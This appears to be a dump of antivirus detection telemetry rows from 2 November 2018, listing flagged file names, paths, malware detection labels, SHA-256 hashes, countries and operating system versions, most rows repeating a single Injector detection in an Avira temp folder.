  Row(detection=Row(filename='~se3259.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~se3259.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='59f1783b2eeb5b97029fabbf5ad240806667ad61ca68f581224f6252a99ed816', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:28:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055255-837f2aff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055255-837F2AFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053959-b52d2977', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053959-B52D2977', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061346-6d1426c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061346-6D1426C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4a75918c7fd1f0ea3ba3a28aaa03900c86d9db3007ec8756ab3be3d27e0ebb1f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4A75918C7FD1F0EA3BA3A28AAA03900C86D9DB3007EC8756AB3BE3D27E0EBB1F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4a75918c7fd1f0ea3ba3a28aaa03900c86d9db3007ec8756ab3be3d27e0ebb1f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:21:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='6c799a753934be6f948c1753fcb37c7b80498f6ba6d848f50bf9459b9cb739bb', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:46:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\安装软件\\官方\\AUTOCAD_2008-64bit官方简体中文版(64位)安装版\\AutoCAD2008-64bit\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='67f83d6bfd034463cceab0e0b41c753ddf75d5aea595004d4a87219472d7632c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-02T08:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='49f0ff1bf24fd1c0c796f0aca91afa7ab791afc1daa8f206d4e052dda7c78a37', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-5.categorizing\\49F0FF1BF24FD1C0C796F0ACA91AFA7AB791AFC1DAA8F206D4E052DDA7C78A37', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='49f0ff1bf24fd1c0c796f0aca91afa7ab791afc1daa8f206d4e052dda7c78a37', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T13:33:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051848-bf600ccc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051848-BF600CCC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052911-32a77398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052911-32A77398', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051649-78b87ee4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051649-78B87EE4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060801-9fc6bc47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060801-9FC6BC47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051350-0db5d8d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051350-0DB5D8D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055024-29e999dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055024-29E999DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053614-2f294fb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053614-2F294FB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060849-bc2b122b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060849-BC2B122B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052754-0500e814', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052754-0500E814', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052624-cf3127e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052624-CF3127E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061007-eaa256ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061007-EAA256CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052326-65149f46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052326-65149F46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052901-2d310753', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052901-2D310753', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053933-a5bba726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053933-A5BBA726', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055342-9fa243ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055342-9FA243ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055049-38ac6f9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055049-38AC6F9F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053514-0b91155a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053514-0B91155A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062455-fc5674a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062455-FC5674A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061855-25ae6f06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061855-25AE6F06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051016-8e455242', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051016-8E455242', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061158-2d082243', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061158-2D082243', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062512-0682710d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062512-0682710D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061912-2fa96f36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061912-2FA96F36', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061102-0bc6ece4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061102-0BC6ECE4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:26:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061521-a5c06a31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061521-A5C06A31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050845-5865f616', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050845-5865F616', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055906-6096763d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055906-6096763D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062503-00cc81ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062503-00CC81AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051254-ecc26de6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051254-ECC26DE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051141-c14e4bab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051141-C14E4BAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050638-0c4b696e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050638-0C4B696E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055829-4aea676d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055829-4AEA676D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054153-f92a7410', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054153-F92A7410', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062004-4eb5c91f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062004-4EB5C91F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050511-d8d911a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050511-D8D911A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062251-b22f9520', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062251-B22F9520', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055825-48a619c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055825-48A619C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051454-3445ac00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051454-3445AC00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\AppData\\Local\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:07:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1cdad941.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1cdad941.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:02:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055405-ad6edb28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055405-AD6EDB28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:04Z'), dt=datetime.date(2018, 11, 2)),
